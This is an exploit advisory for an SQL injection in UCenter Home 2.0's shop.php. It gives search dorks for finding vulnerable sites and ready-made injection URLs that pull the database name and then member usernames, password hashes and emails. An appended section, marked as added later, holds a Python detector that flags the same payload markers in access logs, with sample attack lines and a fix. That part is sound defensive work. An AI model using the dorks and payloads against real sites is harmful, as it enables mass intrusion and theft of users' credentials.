__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greetz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
DB : OK.
Edit your DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : OK.
Use hex conversion, then edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
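
Detection sketch for the request pattern in this advisory, added here as an example and not part of the original post: it flags `shop.php` requests whose `shopid` is not a plain integer and labels those carrying the error-based markers seen above (`floor(rand(`, `group by`, `information_schema`). The combined access-log format, the integer-only rule for `shopid`, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log; (.+?) tolerates raw spaces.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Markers of the error-based technique in this advisory: a duplicate-key
# error forced by floor(rand(0)*2) under GROUP BY over information_schema.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"group\s+by", r"information_schema")]

def classify(line):
    """Return 'clean', 'non-integer-shopid' or 'error-based-sqli'."""
    m = REQUEST.search(line)
    if not m:
        return "clean"
    url = urlsplit(m.group(1))
    # The advisory names Shop.php; compare the file name case-insensitively.
    if url.path.lower().rsplit("/", 1)[-1] != "shop.php":
        return "clean"
    verdict = "clean"
    # parse_qs percent-decodes each value and turns '+' into a space.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue  # assumption: a legitimate shop id is a plain integer
        if all(p.search(value) for p in MARKERS):
            return "error-based-sqli"
        verdict = "non-integer-shopid"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every line that is not clean."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := classify(line)) != "clean"]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2011:10:00:00 +0000] '
    '"GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2011:10:00:05 +0000] '
    '"GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20'
    'count(*),concat(database(),floor(rand(0)*2))x%20from%20'
    'information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2011:10:00:09 +0000] '
    '"GET /Shop.php?ac=view&shopid=12abc HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Log matching of this kind only finds attempts after the fact; the fix on the application side is to cast `shopid` to an integer or bind it as a query parameter before it reaches SQL.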